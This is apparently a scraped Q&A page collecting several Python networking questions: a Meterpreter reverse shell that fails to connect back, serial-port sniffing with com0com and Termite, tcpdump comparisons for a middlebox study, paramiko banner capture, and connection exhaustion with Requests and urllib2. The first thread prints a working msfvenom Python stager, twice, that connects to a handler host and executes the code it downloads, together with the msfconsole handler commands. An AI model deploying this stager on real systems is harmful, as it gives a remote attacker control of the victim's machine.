Meterpreter not connecting back - Python

I have used msfvenom to create the following Python payload:
import socket,struct
s=socket.socket(2,socket.SOCK_STREAM)
s.connect(('MY PUBLIC IP',3930))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
    d+=s.recv(l-len(d))
exec(d,{'s':s})
I have then opened up msfconsole, and done the following:
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set LHOST 192.168.0.186 (MY LOCAL IP)
set LPORT 3930
exploit
It begins the reverse TCP handler on 192.168.0.186:3930, and also starts the payload handler. However, when I run the script on another computer, the payload times out after waiting for about a minute, and msfconsole doesn't register anything. I have forwarded port 3930 on the router. What am I doing wrong here?

This is the code I would use for a reverse TCP on Unix systems, with the details you've provided. However, I stumbled upon your post while searching for the same error, so this isn't 100% flawless. I've gotten it to work perfectly in the past, but just recently it's begun to lag. It'll run once on an internal system, but anything after that gives me the same error message you got. I also get the same message when doing this over the WAN as opposed to LAN, except there it doesn't even run the first time around. What ISP do you have? It may be entirely dependent on that.
import socket,struct
s=socket.socket(2,1)  # 2 == AF_INET, 1 == SOCK_STREAM
s.connect(('IP ADDRESS',3930))
# the first 4 bytes are the big-endian length of the stage that follows
l=struct.unpack('>I',s.recv(4))[0]
d=b''
while len(d)<l:
    # never read past the advertised length, or a != test can loop forever
    d+=s.recv(min(4096,l-len(d)))
exec(d,{'s':s})
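As a side note, before suspecting the payload it's worth checking that the forwarded port is reachable at all from outside. A minimal sketch, using only the stdlib and the same address placeholder as in the question:

import socket

# If this times out, the problem is port forwarding or routing,
# not the payload or the handler configuration.
try:
    s = socket.create_connection(('MY PUBLIC IP', 3930), timeout=5)
    print('handler reachable')
    s.close()
except socket.error as e:
    print('cannot reach handler: %s' % e)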

Related

I am sending commands through a serial port in Python but they are sent multiple times instead of once

I am sending some commands, each with a particular response, serially over a COM port. The commands are kept in a file; I read the file line by line and send each command over the COM port. But when I watch the receiving end using Magic Terminal (software), I see each command arriving multiple times, although I send it only once. I wrote the code in PyCharm, and in its console I can see the command going out only once, but at the UART receiving end the story is something else. I am stuck with this problem. I have kept the same baud rate and everything else, but I am not able to diagnose the issue.
GitHub link for the code: https://github.com/AkshatPant06/Akshat-Pant/blob/master/cmd%20list
import time
import serial  # pyserial

# ser (an open serial.Serial) and intCmd (the current command's bytes)
# are set up elsewhere in the script
def recvResponse():
    ser.write(serial.to_bytes(intCmd))
    time.sleep(1)
    data_recv = ser.read(2)
    return data_recv

I use this to receive the 2-byte response.
There seems to be nothing wrong with your code. At least to the extent I could reproduce it, the command is only sent once (I tried your function after setting up my serial port in loopback).
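For anyone who wants to repeat that check without a physical loopback plug, pyserial's loop:// handler echoes every write straight back to the same port; the command bytes below are placeholders:

import serial  # pyserial

ser = serial.serial_for_url('loop://', timeout=1)
intCmd = [0x01, 0x02]  # stand-in for one command from the file

ser.write(serial.to_bytes(intCmd))
print(ser.read(2))  # the command comes back exactly once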
I cannot say for sure, but it might be that the terminal you're using has two windows, one for input and another for output, and you're getting confused about what is coming in and going out of your port.
One easy way to deal with this kind of issue is to use a sniffer on your port. You can do that by combining com0com and Termite on Windows, as I recently explained here.
As you can see, there is only one window on this terminal, and after setting up the forwarding you'll see everything that comes in and out of your port. That should make it easier to see what your code is writing and reading.
To give you a conventional scenario to apply the sniffer trick you can refer to the following screenshot:
In this case, we have two real serial ports on a computer. On the first (COM9) we are running a Modbus server (you can imagine it as a bunch of memory addresses, each of them storing a 16-bit number). On COM10 we have a client that is sending queries asking for the contents of the first 10 addresses (called registers in Modbus terminology). In a general use case, we have those ports linked with a cable, so we know (theoretically) that the client on COM10 is sending a data frame asking for those ten registers and the server on COM9 is answering with the numbers stored in those registers. But we are only able to see the contents on the server (left side of the picture) and what the client is receiving (right). What we don't see is what is traveling on the bus (yes, we know what it is, but we don't know exactly what the Modbus protocol looks like on the inside).
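To make that last point concrete, this is roughly what the client's request looks like on the wire. The sketch below builds a Modbus RTU read-holding-registers frame by hand with pyserial; the port name and baud rate are assumptions, and in practice you'd use a Modbus library instead:

import struct
import serial  # pyserial

def crc16_modbus(frame):
    # standard Modbus RTU CRC-16: init 0xFFFF, reflected polynomial 0xA001
    crc = 0xFFFF
    for byte in frame:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0xA001 if crc & 1 else crc >> 1
    return struct.pack('<H', crc)  # CRC travels low byte first

# slave 1, function 3 (read holding registers), start address 0, count 10
request = struct.pack('>BBHH', 1, 3, 0, 10)
request += crc16_modbus(request)
print(request.hex())  # the same hex bytes a sniffer would show

ser = serial.Serial('COM10', 9600, timeout=1)
ser.write(request)
response = ser.read(25)  # addr + func + byte count + 20 data bytes + CRC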
If we want to tap on the bus to see what is being sent and received on each side we can create a couple of virtual ports with com0com and a port forwarding connection with Termite, something like the following screenshot:
Now we have moved our Modbus server to one of the virtual serial ports (COM4 in this case). After installing com0com we got (by default, but you can change names or add more port pairs, of course) a pair of forwarded ports (COM4<-->COM5). Now, if we want to see what is circulating through the ports we open Termite (bottom-right side of the picture) and set up another port forwarding scheme, in this case from virtual port COM5 to the real port COM9.
Finally (and exactly the same as before we were sniffing), we have COM9 connected to COM10 with a cable. But now we are able to see all the data going to and fro on the bus (all those hex values Termite displays in the green/blue font).
As you can see, this will offer something similar to what you can do with more professional tools.

How can there be differences in what my Computer sends and what my Router receives?

Since this is my first question, please excuse me if I did anything wrong, I'm happy to learn :)
I have tried to solve this for about 3 months but couldn't get it to work. I think the fault is mine, but the only thing clear to me is that something is wrong; I've run out of ideas as to where it could be.
tl;dr:
I'm having trouble with my desktop and router appearing to capture different traffic, without anything between those two. I have rewritten my scripts several times but couldn't get it to work.
Here is my context:
In my bachelor thesis I'm interested in middlebox behaviour.
For this I have a setup in which one Ubuntu Server machine is set up as a router using dnsmasq and the isc-dhcp-server, and another machine running Ubuntu Desktop is connected to the server machine's subnet over Ethernet.
To test the middleboxes, I'm calling every one of the Alexa top sites (for testing purposes either the top 10 or top 100) using Firefox + Selenium, once with each middlebox and once without anything between the Desktop and Server (Router). At the same time I'm logging the requested domains using tcpdump on the desktop and on the server. For my question, however, the middleboxes are not really important; they only illustrate why I'm doing this.
To illustrate my setup I made this diagram (I'm not allowed to post images since I don't have enough reputation):
The Desktop loops through the Alexa list, whereas the server sits in an infinite loop until it receives a quit message from the Desktop.
In the Desktop's script there are timeouts (I've experimented with values between 3s and 60s) between each step as it cycles through the Alexa list of websites.
The tcpdump captures are named according to the current domain plus middlebox/plain.
Afterwards, another Python script loads the tcpdump captures, cycles through the DNS packets, and creates a dictionary with IP:domain mappings. Then it creates a dictionary with each domain from the Alexa list as a key and, as the value, a set of subsequently called domains. This is done for the traffic captured on the server and for the traffic captured on the desktop; both use the desktop's DNS dictionary.
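As a rough sketch of that mapping step (using scapy here for illustration; the real setup used PyShark/tcpdump, so names and file layout are assumptions):

from scapy.all import rdpcap, DNS, DNSRR

def build_dns_map(pcap_path):
    # map each resolved IP to the domain whose DNS answer produced it
    ip_to_domain = {}
    for pkt in rdpcap(pcap_path):
        if pkt.haslayer(DNS) and pkt[DNS].ancount > 0:
            for i in range(pkt[DNS].ancount):
                rr = pkt.getlayer(DNSRR, i + 1)  # (i+1)-th answer record
                if rr is not None and rr.type == 1:  # A record
                    ip_to_domain[rr.rdata] = rr.rrname.decode().rstrip('.')
    return ip_to_domain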
Finally, I have a script comparing the generated dictionaries, along the lines of the sketch below.
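A minimal version of that comparison, assuming each capture has already been reduced to a {alexa_domain: set_of_subcall_domains} dictionary (all names hypothetical); it produces output in the same shape as the example further down:

def compare(pc_map, router_map):
    report = {}
    for domain in set(pc_map) | set(router_map):
        pc = pc_map.get(domain, set())
        rt = router_map.get(domain, set())
        report[domain] = {
            'On PC but not on Router': sorted(pc - rt),
            'On Router but not on PC': sorted(rt - pc),
        }
    return report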
To verify the differences between Desktop and Server for the middleboxes, I compare the plain pages as well. However, there are always differences between the domains captured on the desktop and on the server, usually between 2 and 5 differing subcalls per Alexa domain. (Those are subcalls I would expect other Alexa domains to make. For example, wikipedia.org is probably not calling facebook.com, but facebook.com itself probably is; Facebook showing up as a subcall of Wikipedia is what irritates me.) From my understanding this shouldn't be the case. In the beginning I was using the Python library PyShark, but because these problems kept appearing I thought using tcpdump directly might do the trick.
I tried setting bigger timeouts, I tried capturing all traffic in a single file and I tried rewriting every line of code I thought could be erroneous.
There has to be an error somewhere, but I can't seem to find it. I know there is always some packet loss, but especially when connected directly over Ethernet I can't imagine it being this high.
I suspect unexpected behavior from the combination of Selenium/Firefox and tcpdump. Latency in starting up or shutting down either of them may be an issue, but I don't think it could be longer than 60s. I also expect the Ubuntu desktop to send auto-update requests and other system traffic while I'm running the tests, but first, I don't think those amount to that many requests, and second, I have my iptables set up to only allow TCP requests from the user that starts the Python script.
Thank you so much for taking the time.
If you have any ideas/remarks where I could have gone wrong, I'd be grateful to hear it. If you have further questions, please don't hesitate to ask.
EDIT:(Clarification about what I'm trying to achieve)
My hypothesis is that if I call a domain with my desktop computer's browser and capture the network traffic on both the desktop and the router, both captures should contain the same packets.
If I have a middlebox which blocks some of the domains and put it between the desktop computer and the router, comparing the domains appearing in the traffic captured on the PC and on the router should yield exactly those domains that the middlebox blocked.
My Problem:
Even without a middlebox, there is a difference in the captured traffic and I don't know where it is coming from.
Example (I made this one up, I'll post a real one once I'm back at uni):
Expected behavior:
wikipedia.org: {On PC but not on Router: [], On Router but not on PC: []}
facebook.com: {On PC but not on Router: [], On Router but not on PC: []}
Actual behavior:
wikipedia.org: {On PC but not on Router: [facebook.com], On Router but not on PC: []}
facebook.com: {On PC but not on Router: [], On Router but not on PC: []}

Paramiko get stdout from connection object (not exec_command)

I'm writing a script that uses paramiko to SSH onto several remote hosts and run a few checks. Some hosts are set up as fail-overs for others, and I can't determine which is in use until I try to connect. Upon connecting to one of these 'inactive' hosts, the host informs me that I need to connect to another 'active' IP and then closes the connection after n seconds. This appears to be written to the stdout of the SSH connection/session (i.e. it is not an SSH banner).
I've used paramiko quite a bit, but I'm at a loss as to how to get this output from the connection. exec_command will obviously give me stdout and stderr, but the host emits this message immediately upon connection and doesn't accept any other incoming requests/messages; it just closes after n seconds.
I don't want to have to wait until the timeout to move onto the next host and I'd also like to verify that that's the reason for not being able to connect and run the checks, otherwise my script works as intended.
Any suggestions as to how I can capture this output, with or without paramiko, is greatly appreciated.
I figured out a way to get the data; it was pretty straightforward, to be honest, albeit a little hackish. This might not work in other cases, especially if there is latency, but I could also be misunderstanding what's happening:
When the connection opens, the server spits out two messages, one saying it can't chdir to a particular directory, then a few milliseconds later it spits out another message stating that you need to connect to the other IP. If I send a command immediately after connecting (doesn't matter what command), exec_command will interpret this second message as the response. So for now I have a solution to my problem as I can check this string for a known message and change the flow of execution.
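In code, the workaround looks something like this (host, credentials, and the exact redirect wording are all placeholders):

import paramiko

client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect('failover-host.example.com', username='user',
               password='secret', timeout=10)

# any cheap command works; the server's startup chatter comes back
# as if it were this command's output
stdin, stdout, stderr = client.exec_command('true')
banner = stdout.read().decode(errors='replace')

if 'connect to' in banner:  # known fragment of the redirect message
    print('standby node; switch to the active IP')
client.close()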
However, if what I describe is accurate, then this may not work in situations where there is too much latency and the 'test' command isn't sent before the server response has been received.
As far as I can tell (and I may be very wrong), there is currently no proper way to get the stdout stream immediately after opening the connection with paramiko. If someone knows a way, please let me know.

Python Requests Not Cleaning up Connections and Causing Port Overflow?

I'm doing something fairly outside of my comfort zone here, so hopefully I'm just doing something stupid.
I have an Amazon EC2 instance which I'm using to run a specialized database, which is controlled through a webapp inside of Tomcat that provides a REST API. On the same server, I'm running a Python script that uses the Requests library to make hundreds of thousands of simple queries to the database (I don't think it's possible to consolidate the queries, though I am going to try that next.)
The problem: after running the script for a bit, I suddenly get a broken pipe error on my SSH terminal. When I try to log back in with SSH, I keep getting "operation timed out" errors. So I can't even log back in to terminate the Python process and instead have to reboot the EC2 instance (which is a huge pain, especially since I'm using ephemeral storage)
My theory is that each time Requests makes a REST call, it opens a pair of ports between Python and Tomcat but never closes them when it's done. So Python keeps grabbing more and more ports, and eventually it either somehow grabs and locks the SSH port (booting me off), or it simply uses up all the ports, which causes the networking stack to fall over somehow (as I said, I'm out of my depth).
I also tried using httplib2, and was getting a similar problem.
Any ideas? If my port theory is correct, is there a way to force requests to surrender the port when it's done? Or otherwise is there at least a way to tell Ubuntu to keep the SSH port off-limits so that I can at least log back in and terminate the process?
Or is there some sort of best practice to using Python to make lots and lots of very simple REST calls?
Edit:
Solved...do:
s = requests.session()
s.config['keep_alive'] = False
Before making the request to force Requests to release connections when it's done.
My speculation:
https://github.com/kennethreitz/requests/blob/develop/requests/models.py#L539 sets conn to connectionpool.connection_from_url(url)
That leads to https://github.com/kennethreitz/requests/blob/develop/requests/packages/urllib3/connectionpool.py#L562, which leads to https://github.com/kennethreitz/requests/blob/develop/requests/packages/urllib3/connectionpool.py#L167.
This eventually leads to https://github.com/kennethreitz/requests/blob/develop/requests/packages/urllib3/connectionpool.py#L185:
def _new_conn(self):
    """
    Return a fresh :class:`httplib.HTTPConnection`.
    """
    self.num_connections += 1
    log.info("Starting new HTTP connection (%d): %s" %
             (self.num_connections, self.host))
    return HTTPConnection(host=self.host, port=self.port)
I would suggest hooking a handler up to that logger, and listening for lines that match that one. That would let you see how many connections are being created.
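Something like this should do it. The logger name follows the module path as vendored inside Requests at the time; on standalone urllib3 it would be 'urllib3.connectionpool':

import logging

handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(name)s: %(message)s'))

pool_logger = logging.getLogger('requests.packages.urllib3.connectionpool')
pool_logger.addHandler(handler)
pool_logger.setLevel(logging.INFO)
# every "Starting new HTTP connection" line now prints, so you can
# count how many connections the script really opens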
Figured it out...Requests has a default 'Keep Alive' policy on connections which you have to explicitly override by doing
s = requests.session()
s.config['keep_alive'] = False
before you make a request.
From the doc:
"""
Keep-Alive
Excellent news — thanks to urllib3, keep-alive is 100% automatic within a session! Any requests that you make within a session will automatically reuse the appropriate connection!
Note that connections are only released back to the pool for reuse once all body data has been read; be sure to either set prefetch to True or read the content property of the Response object.
If you’d like to disable keep-alive, you can simply set the keep_alive configuration to False:
s = requests.session()
s.config['keep_alive'] = False
"""
There may be a subtle bug in Requests here because I WAS reading the .text and .content properties and it was still not releasing the connections. But explicitly passing 'keep alive' as false fixed the problem.
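A note for readers on current versions: s.config was removed in Requests 1.0, so the snippet above no longer works there. A comparable effect (no reused connections) can be had by asking the server to close each connection, for example:

import requests

s = requests.Session()
s.headers['Connection'] = 'close'  # server closes, so nothing is reused
r = s.get('http://localhost:8080/api')  # placeholder URL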

Python urllib2.urlopen bug: timeout error brings down my Internet connection?

I don't know if I'm doing something wrong, but I'm 100% sure it's the Python script that brings down my Internet connection.
I wrote a Python script to scrape header info for thousands of files, mainly the Content-Length, to get the exact size of each file using a HEAD request.
Sample code:
import urllib2

class HeadRequest(urllib2.Request):
    def get_method(self):
        return "HEAD"

response = urllib2.urlopen(HeadRequest("http://www.google.com"))
print response.info()
The thing is, after several hours of running, the script starts to throw 'urlopen error timed out', and my Internet connection is down from then on. The connection always comes back immediately after I close the script. At the beginning I thought the connection might be unstable, but after several runs it turned out to be the script's fault.
I don't know why; this should be considered a bug, right? Or has my ISP banned me for doing such things? (I already set the program to wait 10s between requests.)
BTW, I'm using a VPN; does that have something to do with this?
I'd guess that either your ISP or VPN provider is limiting you because of high-volume suspicious traffic, or your router or VPN tunnel is getting clogged up with half-open connections. Consumer internet is REALLY not intended for spider-type activities.
"the script starts to throw out urlopen error timed out"
We can't even begin to guess.
You need to gather data on your computer and include that data in your question.
Get another computer. Run your script. Is the other computer's internet access blocked also? Or does it still work?
If both computers are blocked, it's not your software, it's your provider. Update your question with this information, and how you got it.
If only the computer running the script is stopped, it's not your provider, it's your OS resources being exhausted. This is harder to diagnose because it could be memory, sockets or file descriptors. Usually it's sockets.
You need to find some ifconfig/ipconfig diagnostic software for your operating system. You need to update your question to state exactly which operating system you're using. Then use that diagnostic software to see how many open sockets are cluttering up your system.
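On Linux you can also watch this from Python itself. A rough sketch: every socket held by a process appears in /proc/<pid>/fd as a link that reads 'socket:[inode]', so counting those shows socket growth over time:

import os

def count_open_sockets(pid=None):
    pid = pid or os.getpid()
    fd_dir = '/proc/%d/fd' % pid
    count = 0
    for fd in os.listdir(fd_dir):
        try:
            target = os.readlink(os.path.join(fd_dir, fd))
        except OSError:
            continue  # fd closed while we were looking
        if target.startswith('socket:'):
            count += 1
    return count

print(count_open_sockets())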
